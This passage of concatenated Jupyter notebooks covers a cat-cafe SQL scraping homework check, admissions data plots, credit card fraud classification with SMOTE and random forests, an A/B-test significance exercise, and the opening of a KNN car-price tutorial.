INSERT INTO cat_cafe(3 1 False
1
INSERT INTO cat_cafe(2 1 True
2
INSERT INTO cat_cafe(2 2 True
3
INSERT INTO cat_cafe(2 3 True
4
INSERT INTO cat_cafe(4 4 True
4
INSERT INTO cat_cafe(1 4 False
5
INSERT INTO cat_cafe(3 5 True
6
INSERT INTO cat_cafe(1 6 True
7
INSERT INTO cat_cafe(1 7 True
7
INSERT INTO cat_cafe(45 7 False
7
INSERT INTO cat_cafe(4 7 False
8
INSERT INTO cat_cafe(3 8 True
8
INSERT INTO cat_cafe(45 8 False
9
INSERT INTO cat_cafe(2 9 False
9
INSERT INTO cat_cafe(3 9 True
10
INSERT INTO cat_cafe(2 10 True
10
INSERT INTO cat_cafe(1 10 False
11
INSERT INTO cat_cafe(2 11 False
11
INSERT INTO cat_cafe(45 11 True
11
INSERT INTO cat_cafe(3 11 False
12
INSERT INTO cat_cafe(2 12 False
12
INSERT INTO cat_cafe(3 12 True
13
INSERT INTO cat_cafe(1 13 False
13
INSERT INTO cat_cafe(4 13 True
14
INSERT INTO cat_cafe(1 14 True
15
INSERT INTO cat_cafe(2 15 True
15
INSERT INTO cat_cafe(3 15 False
16
INSERT INTO cat_cafe(4 16 True
17
INSERT INTO cat_cafe(3 17 True
18
INSERT INTO cat_cafe(3 18 True
18
INSERT INTO cat_cafe(4 18 False
19
INSERT INTO cat_cafe(1 19 False
19
INSERT INTO cat_cafe(2 19 True
20
INSERT INTO cat_cafe(45 20 False
20
INSERT INTO cat_cafe(2 20 True
20
INSERT INTO cat_cafe(4 20 False
21
INSERT INTO cat_cafe(2 21 True
22
INSERT INTO cat_cafe(1 22 True
22
INSERT INTO cat_cafe(4 22 False
23
INSERT INTO cat_cafe(3 23 True
23
INSERT INTO cat_cafe(2 23 False
23
INSERT INTO cat_cafe(4 23 False
24
INSERT INTO cat_cafe(4 24 True
25
INSERT INTO cat_cafe(4 25 False
25
INSERT INTO cat_cafe(1 25 False
25
INSERT INTO cat_cafe(45 25 True
26
INSERT INTO cat_cafe(45 26 False
26
INSERT INTO cat_cafe(3 26 False
26
INSERT INTO cat_cafe(4 26 True
27
INSERT INTO cat_cafe(1 27 False
27
INSERT INTO cat_cafe(2 27 False
27
INSERT INTO cat_cafe(45 27 True
28
INSERT INTO cat_cafe(3 28 True
29
INSERT INTO cat_cafe(45 29 False
29
INSERT INTO cat_cafe(1 29 False
29
INSERT INTO cat_cafe(2 29 True
30
INSERT INTO cat_cafe(3 30 True
31
INSERT INTO cat_cafe(2 31 True
32
INSERT INTO cat_cafe(4 32 True
33
INSERT INTO cat_cafe(2 33 False
33
INSERT INTO cat_cafe(45 33 False
33
INSERT INTO cat_cafe(1 33 True
34
INSERT INTO cat_cafe(4 34 False
34
INSERT INTO cat_cafe(2 34 False
34
INSERT INTO cat_cafe(1 34 True
35
INSERT INTO cat_cafe(2 35 False
35
INSERT INTO cat_cafe(3 35 True
36
INSERT INTO cat_cafe(1 36 True
36
INSERT INTO cat_cafe(2 36 False
37
INSERT INTO cat_cafe(3 37 True
37
INSERT INTO cat_cafe(45 37 False
38
INSERT INTO cat_cafe(4 38 True
39
INSERT INTO cat_cafe(1 39 False
39
INSERT INTO cat_cafe(4 39 False
39
INSERT INTO cat_cafe(2 39 True
40
INSERT INTO cat_cafe(45 40 True
40
INSERT INTO cat_cafe(2 40 False
40
INSERT INTO cat_cafe(4 40 False
###Markdown
Issuing a `SELECT * FROM cat LIMIT 10` in `psql` should yield something that looks like this:``` id | name | birthdate | weight | color | pattern ----+-----------+------------+--------+----------+--------------- 1 | Sylvester | 2015-05-20 | 10.46 | black | colorpoint 2 | Jasper | 2000-01-03 | 8.06 | cinnamon | solid 3 | Luna | 2006-02-27 | 10.88 | brown | tortoiseshell 4 | Georges | 2015-08-13 | 9.40 | white | tabby 5 | Millie | 2003-09-13 | 9.27 | red | bicolor 6 | Lisa | 2009-07-30 | 8.84 | cream | colorpoint 7 | Oscar | 2011-12-15 | 8.44 | cream | solid 8 | Scaredy | 2015-12-30 | 8.83 | lilac | tabby 9 | Charlotte | 2013-10-16 | 9.54 | blue | tabby 10 | Whiskers | 2011-02-07 | 9.47 | white | colorpoint(10 rows)```And a `SELECT * FROM cat_cafe LIMIT 10` in `psql` should look like this:``` cat_id | cafe_id | active --------+---------+-------- 1 | 3 | f 1 | 2 | t 2 | 2 | t 3 | 2 | t 4 | 4 | t 4 | 1 | f 5 | 3 | t 6 | 1 | t 7 | 1 | t 7 | 5 | f(10 rows)```Again, the exact values for the ID columns might be different, depending on how many times you've deleted and dropped the tables. The QueriesOkay. To verify your work, run the following queries and check their output. If you've correctly scraped the data and imported it into SQL, running the cells should produce exactly the expected output, as indicated. If not, then you performed one of the steps above incorrectly; check your work and try again. (Note: Don't modify these cells, just run them! This homework was about *scraping* and *inserting* data, not querying it.) What's the name of the youngest cat at any location?Expected output: `Scaredy`
###Code
cursor.execute("SELECT max(birthdate) FROM cat")
birthdate = cursor.fetchone()[0]
cursor.execute("SELECT name FROM cat WHERE birthdate = %s", [birthdate])
print(cursor.fetchone()[0])
###Output
Scaredy
###Markdown
In which zip codes can I find a lilac-colored tabby?Expected output: 11237, 11215
###Code
conn.rollback()
cursor.execute("""SELECT DISTINCT(cafe.zip)
FROM cat
JOIN cat_cafe ON cat.id = cat_cafe.catid
JOIN cafe ON cafe.id = cat_cafe.cafeid
WHERE cat.color = 'lilac' AND cat.pattern = 'tabby' AND cat_cafe.active = true
""")
print(', '.join([x[0] for x in cursor.fetchall()]))
###Output
11237, 11215
###Markdown
What's the average weight of cats currently residing at all locations?Expected output:```Independent Claws: 9.33Paws and Play: 9.28Tall Tails: 9.82Hang In There: 9.25Cats Meow: 9.76```
###Code
conn.rollback()
cursor.execute("""
SELECT cafe.name, avg(cat.weight)
FROM cat
JOIN cat_cafe ON cat.id = cat_cafe.catid
JOIN cafe ON cafe.id = cat_cafe.cafeid
WHERE cat_cafe.active = True
GROUP BY cafe.name
""")
for rec in cursor.fetchall():
print(rec[0]+":", "%0.2f" % rec[1])
###Output
Hang In There: 9.25
Independent Claws: 9.33
Paws and Play: 9.28
Tall Tails: 9.82
Cats Meow: 9.75
###Markdown
Which location has the most cats with tortoiseshell coats?Expected output: `Independent Claws`
###Code
conn.rollback()
cursor.execute("""
SELECT cafe.name
FROM cat
JOIN cat_cafe ON cat.id = cat_cafe.catid
JOIN cafe ON cafe.id = cat_cafe.cafeid
WHERE cat_cafe.active = true AND cat.pattern = 'tortoiseshell'
GROUP BY cafe.name
ORDER BY count(cat.name) DESC
LIMIT 1
""")
print(cursor.fetchone()[0])
###Output
Independent Claws
|
Data_visualization_seaborn_matplotlin.ipynb | ###Markdown
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
df = pd.read_csv('Admission_Predict_Ver1.1.csv')
data = df
df.head()
sns.relplot(x='GRE Score', y='Chance of Admit ', hue='GRE Score',data=df);
sns.relplot(x='GRE Score', y='Chance of Admit ', hue='CGPA', kind="line", data=df);
def category(x):
if x < 0.80:
return 'less'
else:
return 'high'
df['Chance'] = df['Chance of Admit '].apply(category)
data = data.drop(columns=['Serial No.','Chance'])
data
sns.countplot(x='Chance', data=df, hue='University Rating')
sns.heatmap(data)
data.plot.box()
df['University Rating'].unique()
plt.pie(df['Chance of Admit '], autopct ='% 1.1f %%', shadow = True)
###Output
_____no_output_____ |
credit-card-fraud-prediction-rf-smote.ipynb | ###Markdown
Welcome to my exploration of Credit Card fraud!In this kernel I will do some exploration to understand the fraud transaction patterns, and then I will implement some machine learning models. I will use an oversampling technique called SMOTE together with supervised learning algorithms. Introduction to DatasetThe dataset contains transactions made by credit cards in September 2013 by European cardholders. This dataset presents transactions that occurred over two days, where we have 492 frauds out of 284,807 transactions. The dataset is highly unbalanced: the positive class (frauds) accounts for 0.172% of all transactions.It contains only numerical input variables which are the result of a PCA transformation. Unfortunately, due to confidentiality issues, we cannot provide the original features and more background information about the data. Features V1, V2, ... V28 are the principal components obtained with PCA; the only features which have not been transformed with PCA are 'Time' and 'Amount'. Feature 'Time' contains the seconds elapsed between each transaction and the first transaction in the dataset. The feature 'Amount' is the transaction amount; this feature can be used for example-dependent cost-sensitive learning. Feature 'Class' is the response variable and it takes value 1 in case of fraud and 0 otherwise.Given the class imbalance ratio, we recommend measuring the accuracy using the Area Under the Precision-Recall Curve (AUPRC). Confusion matrix accuracy is not meaningful for unbalanced classification.The dataset has been collected and analysed during a research collaboration of Worldline and the Machine Learning Group (http://mlg.ulb.ac.be) of ULB (Université Libre de Bruxelles) on big data mining and fraud detection. More details on current and past projects on related topics are available at http://mlg.ulb.ac.be/BruFence and http://mlg.ulb.ac.be/ARTML. Let's start by importing the libraries and looking at the data
###Code
import pandas as pd #to handle the data
import numpy as np #for math operations
import seaborn as sns #for visualization
import matplotlib.pyplot as plt # to plot the graphs
import matplotlib.gridspec as gridspec # to do the grid of plots
#loading the data
df_credit = pd.read_csv("C:/Users/Lenovo/Desktop/creditcard.csv")
#looking at how the data looks
df_credit.head()
#looking at the dtypes and searching for null values
df_credit.info()
# The data is standardized; I will explore it later
#For now I will look at the "normal" columns
df_credit[["Time","Amount","Class"]].describe()
###Output
_____no_output_____
###Markdown
Firstly, I will explore three different columns: Time, Amount, and Class
###Code
#Let's start by looking at the difference between Normal and Fraud transactions
print("Distribuition of Normal(0) and Frauds(1): ")
print(df_credit["Class"].value_counts())
LABELS = ["Normal", "Fraud"]
plt.figure(figsize=(7,5))
sns.countplot(df_credit['Class'])
plt.xticks(range(2), LABELS)
plt.title("Class Count", fontsize=18)
plt.xlabel("Is fraud?", fontsize=15)
plt.ylabel("Count", fontsize=15)
plt.show()
###Output
Distribuition of Normal(0) and Frauds(1):
0 284315
1 492
Name: Class, dtype: int64
###Markdown
We clearly have imbalanced data. That's very common when dealing with fraud... First I will explore Time and Amount. Second I will explore the V features, which are the PCA components. Time Features and some Feature EngineeringAs our Time feature is in seconds, we will transform it to minutes and hours to get a better understanding of the patterns
###Code
timedelta = pd.to_timedelta(df_credit['Time'], unit='s')
df_credit['Time_min'] = (timedelta.dt.components.minutes).astype(int)
df_credit['Time_hour'] = (timedelta.dt.components.hours).astype(int)
#Exploring the distribution by Class type through hours and minutes
plt.figure(figsize=(12,5))
sns.distplot(df_credit[df_credit['Class'] == 0]["Time_hour"],
color='g')
sns.distplot(df_credit[df_credit['Class'] == 1]["Time_hour"],
color='r')
plt.title('Fraud x Normal Transactions by Hours', fontsize=17)
plt.xlim([-1,25])
plt.show()
#Exploring the distribution by Class type through hours and minutes
plt.figure(figsize=(12,5))
sns.distplot(df_credit[df_credit['Class'] == 0]["Time_min"],
color='g')
sns.distplot(df_credit[df_credit['Class'] == 1]["Time_min"],
color='r')
plt.title('Fraud x Normal Transactions by minutes', fontsize=17)
plt.xlim([-1,61])
plt.show()
###Output
_____no_output_____
###Markdown
- Interesting distribution, but it doesn't look like a clear pattern of action. Looking at the statistics of Amount for fraud and normal transactions
###Code
#To clearly separate the data into frauds and non-frauds
df_fraud = df_credit[df_credit['Class'] == 1]
df_normal = df_credit[df_credit['Class'] == 0]
print("Fraud transaction statistics")
print(df_fraud["Amount"].describe())
print("\nNormal transaction statistics")
print(df_normal["Amount"].describe())
df_fraud.shape
df_normal.shape
###Output
_____no_output_____
###Markdown
Interesting. Using this information I will filter the values to look at Amount by Class. I will filter the "normal" amounts at 3.000
###Code
#Feature engineering for a better visualization of the values
df_credit['Amount_log'] = np.log(df_credit.Amount + 0.01)
plt.figure(figsize=(14,6))
#I will explore the Amount by Class and see the distribution of Amount transactions
plt.subplot(121)
ax = sns.boxplot(x ="Class",y="Amount",
data=df_credit)
ax.set_title("Class x Amount", fontsize=20)
ax.set_xlabel("Is Fraud?", fontsize=16)
ax.set_ylabel("Amount(US)", fontsize = 16)
plt.subplot(122)
ax1 = sns.boxplot(x ="Class",y="Amount_log", data=df_credit)
ax1.set_title("Class x Amount", fontsize=20)
ax1.set_xlabel("Is Fraud?", fontsize=16)
ax1.set_ylabel("Amount(Log)", fontsize = 16)
plt.subplots_adjust(hspace = 0.6, top = 0.8)
plt.show()
###Output
_____no_output_____
###Markdown
We can see a slight difference in the log Amount of our two classes. The IQR of fraudulent transactions is higher than that of normal transactions, but normal transactions have the highest values. Looking at a scatter plot of the Time_min distribution by Amount
###Code
#Looking at the Amount and time distribution of FRAUD transactions
ax = sns.lmplot(y="Amount", x="Time_min", fit_reg=False,aspect=1.8,
data=df_credit, hue='Class')
plt.title("Amounts by Minutes of Frauds and Normal Transactions",fontsize=16)
plt.show()
###Output
_____no_output_____
###Markdown
Looking at a scatter plot of the Time_hour distribution by Amount
###Code
ax = sns.lmplot(y="Amount", x="Time_hour", fit_reg=False,aspect=1.8,
data=df_credit, hue='Class')
plt.title("Amounts by Hour of Frauds and Normal Transactions", fontsize=16)
plt.show()
###Output
_____no_output_____
###Markdown
I will use distribution plots to search for differing distributions: - We are searching for features whose fraud distribution diverges from the normal-transaction distribution
###Code
#Looking the V's features
columns = df_credit.iloc[:,1:29].columns
frauds = df_credit.Class == 1
normals = df_credit.Class == 0
grid = gridspec.GridSpec(14, 2)
plt.figure(figsize=(15,20*4))
for n, col in enumerate(df_credit[columns]):
ax = plt.subplot(grid[n])
sns.distplot(df_credit[col][frauds], bins = 50, color='g') #distribution of the feature for fraud transactions (green)
sns.distplot(df_credit[col][normals], bins = 50, color='r') #distribution of the feature for normal transactions (red)
ax.set_ylabel('Density')
ax.set_title(str(col))
ax.set_xlabel('')
plt.show()
###Output
_____no_output_____
###Markdown
We can see interestingly different distributions in some of our features, like V4, V9, V16, V17 and several more. Now let's use these observations to pick features. Feature selections
###Code
#I will select the variables where the fraud class shows interesting behavior and that might help us predict
df_credit = df_credit[["Time_hour","Time_min","V2","V3","V4","V9","V10","V11","V12","V14","V16","V17","V18","V19","V27","Amount","Class"]]
###Output
_____no_output_____
###Markdown
Some Feature Engineering
###Code
df_credit.Amount = np.log(df_credit.Amount + 0.001)
#Looking the final df
df_credit.head()
colormap = plt.cm.Greens
plt.figure(figsize=(14,12))
sns.heatmap(df_credit.corr(),linewidths=0.1,vmax=1.0,
square=True, cmap = colormap, linecolor='white', annot=True)
plt.show()
###Output
_____no_output_____
###Markdown
Preprocessing
###Code
from imblearn.pipeline import make_pipeline as make_pipeline_imb # To chain our transformations in a single pipeline
from imblearn.over_sampling import SMOTE
from sklearn.pipeline import make_pipeline
from imblearn.metrics import classification_report_imbalanced
from sklearn.model_selection import train_test_split
from collections import Counter
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_score, recall_score, fbeta_score, confusion_matrix, precision_recall_curve, accuracy_score
X = df_credit.drop(["Class"], axis=1).values #Setting the X to do the split
y = df_credit["Class"].values # transforming the values in array
# the function that we will use to better evaluate the model
def print_results(headline, true_value, pred):
print(headline)
print("accuracy: {}".format(accuracy_score(true_value, pred)))
print("precision: {}".format(precision_score(true_value, pred)))
print("recall: {}".format(recall_score(true_value, pred)))
print("f2: {}".format(fbeta_score(true_value, pred, beta=2)))
# splitting data into training and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=2, test_size=0.20)
classifier = RandomForestClassifier
# build model with SMOTE imblearn
smote_pipeline = make_pipeline_imb(SMOTE(random_state=4), \
classifier(random_state=42))
smote_model = smote_pipeline.fit(X_train, y_train)
smote_prediction = smote_model.predict(X_test)
#Showing the difference before and after the transformation used
print("normal data distribution: {}".format(Counter(y)))
X_smote, y_smote = SMOTE().fit_sample(X, y)
print("SMOTE data distribution: {}".format(Counter(y_smote)))
###Output
normal data distribution: Counter({0: 284315, 1: 492})
SMOTE data distribution: Counter({0: 284315, 1: 284315})
###Markdown
Evaluating the model SMOTE + Random Forest
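Since the dataset description recommends the Area Under the Precision-Recall Curve (AUPRC) for this level of imbalance, it could also be computed alongside the metrics below. A minimal sketch, assuming the fitted `smote_pipeline` and the test split defined above:
```
from sklearn.metrics import average_precision_score
y_scores = smote_pipeline.predict_proba(X_test)[:, 1]
auprc = average_precision_score(y_test, y_scores)
print("AUPRC: {:.4f}".format(auprc))
```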
###Code
print("Confusion Matrix: ")
print(confusion_matrix(y_test, smote_prediction))
conf_matrix=confusion_matrix(y_test, smote_prediction)
print('\nSMOTE Pipeline Score {}'.format(smote_pipeline.score(X_test, y_test)))
print_results("\nSMOTE + RandomForest classification", y_test, smote_prediction)
plt.figure(figsize=(10, 10))
sns.heatmap(conf_matrix, xticklabels=LABELS, yticklabels=LABELS, annot=True, fmt="d");
plt.title("Confusion matrix")
plt.ylabel('True class')
plt.xlabel('Predicted class')
plt.tight_layout()
# Compute predicted probabilities: y_pred_prob
y_pred_prob = smote_pipeline.predict_proba(X_test)[:,1]
# Generate precision recall curve values: precision, recall, thresholds
precision, recall, thresholds = precision_recall_curve(y_test, y_pred_prob)
# Plot precision-recall curve
plt.plot(precision, recall)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('Precision Recall Curve')
plt.show()
###Output
_____no_output_____
###Markdown
CONSIDERING ONLY RANDOM FOREST FOR COMPARING THE MODEL
###Code
# Running the fit
from sklearn.ensemble import RandomForestClassifier
rf = RandomForestClassifier(max_depth=5, max_features = 7, n_estimators = 10)
rf.fit(X_train, y_train)
# Printing the Training Score
print("Training score data: ")
print(rf.score(X_train, y_train))
#Testing the model
#Predicting by X_test
y_pred = rf.predict(X_test)
print(confusion_matrix(y_test, y_pred))
print_results("RF classification", y_test, y_pred)
###Output
[[56871 7]
[ 16 68]]
RF classification
accuracy: 0.9995962220427653
precision: 0.9066666666666666
recall: 0.8095238095238095
f2: 0.8272506082725061
###Markdown
Feature importance plot
###Code
features = ["Time_min", 'Time_hours',"V2","V3","V4","V9","V10","V11","V12","V14","V16","V17","V18","V19","V27","Amount"]
plt.figure(figsize = (9,5))
feat_import = pd.DataFrame({'Feature': features, 'Feature importance': rf.feature_importances_})
feat_import = feat_import.sort_values(by='Feature importance',ascending=False)
g = sns.barplot(x='Feature',y='Feature importance',data=feat_import)
g.set_xticklabels(g.get_xticklabels(),rotation=90)
g.set_title('Features importance - Random Forest',fontsize=20)
plt.show()
###Output
_____no_output_____
###Markdown
The top 4 features (V17, V14, V12, V10) account for roughly 75% of the total importance. The F2 score, a weighted mean of precision and recall that puts more emphasis on recall, is also at a reasonable level.
###Code
#Predicting proba
y_pred_prob = rf.predict_proba(X_test)[:,1]
# Generate precision recall curve values: precision, recall, thresholds
precision, recall, thresholds = precision_recall_curve(y_test, y_pred_prob)
# Plot precision-recall curve
plt.plot(precision, recall)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('Precision Recall Curve')
plt.show()
###Output
_____no_output_____ |
ABTesting/L2_Statistical_Significance_Solution.ipynb | ###Markdown
Practice: Statistical SignificanceLet's say that we've collected data for a web-based experiment. In the experiment, we're testing the change in layout of a product information page to see if this affects the proportion of people who click on a button to go to the download page. This experiment has been designed to have a cookie-based diversion, and we record two things from each user: which page version they received, and whether or not they accessed the download page during the data recording period. (We aren't keeping track of any other factors in this example, such as number of pageviews, or time between accessing the page and making the download, that might be of further interest.)Your objective in this notebook is to perform a statistical test on both recorded metrics to see if there is a statistical difference between the two groups.
###Code
# import packages
import numpy as np
import pandas as pd
import scipy.stats as stats
from statsmodels.stats import proportion as proptests
import matplotlib.pyplot as plt
% matplotlib inline
# import data
data = pd.read_csv('data/statistical_significance_data.csv')
data.head(10)
###Output
_____no_output_____
###Markdown
In the dataset, the 'condition' column takes a 0 for the control group, and 1 for the experimental group. The 'click' column takes a values of 0 for no click, and 1 for a click. Checking the Invariant MetricFirst of all, we should check that the number of visitors assigned to each group is similar. It's important to check the invariant metrics as a prerequisite so that our inferences on the evaluation metrics are founded on solid ground. If we find that the two groups are imbalanced on the invariant metric, then this will require us to look carefully at how the visitors were split so that any sources of bias are accounted for. It's possible that a statistically significant difference in an invariant metric will require us to revise random assignment procedures and re-do data collection.In this case, we want to do a two-sided hypothesis test on the proportion of visitors assigned to one of our conditions. Choosing the control or the experimental condition doesn't matter: you'll get the same result either way. Feel free to use whatever method you'd like: we'll highlight two main avenues below.If you want to take a simulation-based approach, you can simulate the number of visitors that would be assigned to each group for the number of total observations, assuming that we have an expected 50/50 split. Do this many times (200 000 repetitions should provide a good speed-variability balance in this case) and then see in how many simulated cases we get as extreme or more extreme a deviation from 50/50 that we actually observed. Don't forget that, since we have a two-sided test, an extreme case also includes values on the opposite side of 50/50. (e.g. Since simulated outcomes of .48 and lower are considered as being more extreme than an actual observation of 0.48, so too will simulated outcomes of .52 and higher.) The proportion of flagged simulation outcomes gives us a p-value on which to assess our observed proportion. We hope to see a larger p-value, insufficient evidence to reject the null hypothesis.If you want to take an analytic approach, you could use the exact binomial distribution to compute a p-value for the test. The more usual approach, however, is to use the normal distribution approximation. Recall that this is possible thanks to our large sample size and the central limit theorem. To get a precise p-value, you should also perform a continuity correction, either adding or subtracting 0.5 to the total count before computing the area underneath the curve. (e.g. If we had 415 / 850 assigned to the control group, then the normal approximation would take the area to the left of $(415 + 0.5) / 850 = 0.489$ and to the right of $(435 - 0.5) / 850 = 0.511$.)You can check your results by completing the quiz and watching the video following the workspace. You could also try using multiple approaches and seeing if they come up with similar outcomes! Analytic Approach
###Code
# get number of trials and number of 'successes'
n_obs = data.shape[0]
n_control = data.groupby('condition').size()[0]
n_control
# Compute a z-score and p-value
p = 0.5
sd = np.sqrt(p * (1-p) * n_obs)
z = ((n_control + 0.5) - p * n_obs) / sd
print(z)
print(2 * stats.norm.cdf(z))
###Output
-0.506217597735
0.612703902554
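###Markdown
 The text above also mentions the exact binomial distribution as an alternative. A hedged sketch of that check, assuming SciPy 1.7+ (older versions expose `stats.binom_test` instead of `stats.binomtest`):
###Code
# Exact two-sided binomial test of n_control successes out of n_obs trials at p = 0.5
exact_result = stats.binomtest(n_control, n_obs, p=0.5, alternative='two-sided')
print(exact_result.pvalue)
###Output
_____no_output_____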
###Markdown
Simulation Approach
###Code
# get number of trials and number of 'successes'
n_obs = data.shape[0]
n_control = data.groupby('condition').size()[0]
n_control
# # simulate outcomes under null, compare to observed outcome
p = 0.5
n_trials = 200_000
samples = np.random.binomial(n_obs, p, n_trials)
print(np.logical_or(samples <= n_control, samples >= (n_obs - n_control)).mean())
###Output
0.611725
###Markdown
Checking the Evaluation MetricAfter performing our checks on the invariant metric, we can move on to performing a hypothesis test on the evaluation metric: the click-through rate. In this case, we want to see that the experimental group has a significantly larger click-through rate than the control group, a one-tailed test.The simulation approach for this metric isn't too different from the approach for the invariant metric. You'll need the overall click-through rate as the common proportion to draw simulated values from for each group. You may also want to perform more simulations since there's higher variance for this test.There's a few analytic approaches possible here, but you'll probably make use of the normal approximation again in these cases. In addition to the pooled click-through rate, you'll need a pooled standard deviation in order to compute a z-score. While there is a continuity correction possible in this case as well, it's much more conservative than the p-value that a simulation will usually imply. Computing the z-score and resulting p-value without a continuity correction should be closer to the simulation's outcomes, though slightly more optimistic about there being a statistical difference between groups.As with the previous question, you'll find a quiz and video following the workspace for you to check your results.
###Code
p_click = data.groupby('condition').mean()['click']
p_click
p_click[1] - p_click[0]
###Output
_____no_output_____
###Markdown
Analytic Approach
###Code
# get number of trials and overall 'success' rate under null
n_control = data.groupby('condition').size()[0]
n_exper = data.groupby('condition').size()[1]
p_null = data['click'].mean()
# compute standard error, z-score, and p-value
se_p = np.sqrt(p_null * (1-p_null) * (1/n_control + 1/n_exper))
z = (p_click[1] - p_click[0]) / se_p
print(z)
print(1-stats.norm.cdf(z))
###Output
1.75718873962
0.0394428219746
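###Markdown
 As a cross-check (not part of the original solution), the same one-tailed two-proportion z-test can be run with the statsmodels helper imported at the top of the notebook; listing the experimental group first and using `alternative='larger'` should mirror the hand-computed test above.
###Code
# Hedged cross-check with statsmodels' proportions_ztest
clicks_exper = data[data['condition'] == 1]['click'].sum()
clicks_control = data[data['condition'] == 0]['click'].sum()
z_stat, p_val = proptests.proportions_ztest(count=[clicks_exper, clicks_control],
                                            nobs=[n_exper, n_control],
                                            alternative='larger')
print(z_stat, p_val)
###Output
_____no_output_____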
###Markdown
Simulation Approach
###Code
# get number of trials and overall 'success' rate under null
n_control = data.groupby('condition').size()[0]
n_exper = data.groupby('condition').size()[1]
p_null = data['click'].mean()
# simulate outcomes under null, compare to observed outcome
n_trials = 200_000
ctrl_clicks = np.random.binomial(n_control, p_null, n_trials)
exp_clicks = np.random.binomial(n_exper, p_null, n_trials)
samples = exp_clicks / n_exper - ctrl_clicks / n_control
print((samples >= (p_click[1] - p_click[0])).mean())
###Output
0.039785
|
_notebooks/2021-12-21-Predicting-Car-Prices-K-Nearest-Neighbors.ipynb | ###Markdown
"Predicting Car Prices using the K Nearest Neighbors Algorithm"> "I use various machine learning workflow techniques to arrive at the optimal K Nearest Neighbors (KNN) regression model for predicting car prices."- author: Migs Germar- toc: true- branch: master- badges: true- comments: true- categories: [python, pandas, numpy, matplotlib, seaborn, scipy, sklearn]- hide: false- search_exclude: false- image: images/notebook-images/knn-car-prices/two-cars.jfif Wheelscene | Chris Smith IntroductionK Nearest Neighbors or KNN is an an algorithm that can make predictions based on the similarity between different observations. In this project, I used KNN to predict the price of a car based on how similar its features are to those of other cars. Towards this end, I applied various machine learning techniques, such as standardization, feature selection, train-test split, hyperparameter optimization, and k-fold cross validation. > Note: I wrote this notebook by following a guided project on the [Dataquest](https://www.dataquest.io/) platform, specifically the [Guided Project: Predicting Car Prices](https://app.dataquest.io/c/36/m/155/guided-project%3A-predicting-car-prices/1/introduction-to-the-data-set). The general project flow and research questions were guided by Dataquest. Furthermore, though the mathematical explanations in this post were written in my own words, I learned the theory from Dataquest. Below are the packages used in this project.
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import re
from scipy.stats import zscore
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import KFold, cross_val_score, train_test_split
from sklearn.feature_selection import f_regression, SelectKBest
from sklearn.metrics import mean_squared_error
###Output
_____no_output_____
###Markdown
Data Inspection and CleaningThe dataset for this project is the Automobile Data Set by Schlimmer (1987), from the UCI Machine Learning Repository. The data and its description can be obtained [here](https://archive.ics.uci.edu/ml/datasets/automobile).The dataset describes 26 features of hundreds of cars. A summary of the features and their data types is shown below.
###Code
#collapse-hide
# Data dictionary from documentation.
data_dict = """1. symboling: -3, -2, -1, 0, 1, 2, 3.
2. normalized-losses: continuous from 65 to 256.
3. make:
alfa-romero, audi, bmw, chevrolet, dodge, honda,
isuzu, jaguar, mazda, mercedes-benz, mercury,
mitsubishi, nissan, peugot, plymouth, porsche,
renault, saab, subaru, toyota, volkswagen, volvo
4. fuel-type: diesel, gas.
5. aspiration: std, turbo.
6. num-of-doors: four, two.
7. body-style: hardtop, wagon, sedan, hatchback, convertible.
8. drive-wheels: 4wd, fwd, rwd.
9. engine-location: front, rear.
10. wheel-base: continuous from 86.6 120.9.
11. length: continuous from 141.1 to 208.1.
12. width: continuous from 60.3 to 72.3.
13. height: continuous from 47.8 to 59.8.
14. curb-weight: continuous from 1488 to 4066.
15. engine-type: dohc, dohcv, l, ohc, ohcf, ohcv, rotor.
16. num-of-cylinders: eight, five, four, six, three, twelve, two.
17. engine-size: continuous from 61 to 326.
18. fuel-system: 1bbl, 2bbl, 4bbl, idi, mfi, mpfi, spdi, spfi.
19. bore: continuous from 2.54 to 3.94.
20. stroke: continuous from 2.07 to 4.17.
21. compression-ratio: continuous from 7 to 23.
22. horsepower: continuous from 48 to 288.
23. peak-rpm: continuous from 4150 to 6600.
24. city-mpg: continuous from 13 to 49.
25. highway-mpg: continuous from 16 to 54.
26. price: continuous from 5118 to 45400."""
# Use regex to extract column names from data dictionary.
col_names = re.findall(
pattern = r"^[0-9]{1,2}\. ([a-z\-]+):",
string = data_dict,
# Use multiline flag so that ^ indicates the start of a line.
flags = re.MULTILINE,
)
# Read data file and add column names.
cars_df = pd.read_csv(
"./private/Car-Prices-KNN-Files/imports-85.data",
names = col_names,
)
cars_df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 205 entries, 0 to 204
Data columns (total 26 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 symboling 205 non-null int64
1 normalized-losses 205 non-null object
2 make 205 non-null object
3 fuel-type 205 non-null object
4 aspiration 205 non-null object
5 num-of-doors 205 non-null object
6 body-style 205 non-null object
7 drive-wheels 205 non-null object
8 engine-location 205 non-null object
9 wheel-base 205 non-null float64
10 length 205 non-null float64
11 width 205 non-null float64
12 height 205 non-null float64
13 curb-weight 205 non-null int64
14 engine-type 205 non-null object
15 num-of-cylinders 205 non-null object
16 engine-size 205 non-null int64
17 fuel-system 205 non-null object
18 bore 205 non-null object
19 stroke 205 non-null object
20 compression-ratio 205 non-null float64
21 horsepower 205 non-null object
22 peak-rpm 205 non-null object
23 city-mpg 205 non-null int64
24 highway-mpg 205 non-null int64
25 price 205 non-null object
dtypes: float64(5), int64(5), object(16)
memory usage: 41.8+ KB
###Markdown
There are 205 cars and 26 features. Most of the features directly describe physical characteristics of the cars. Some exceptions are "symboling" and "normalized-losses", which are values related to car insurance and are beyond the scope of this project. Also, the "price" column provides the price of each car in USD.Let us look at the first five rows.
###Code
#collapse-hide
cars_df.head()
###Output
_____no_output_____
###Markdown
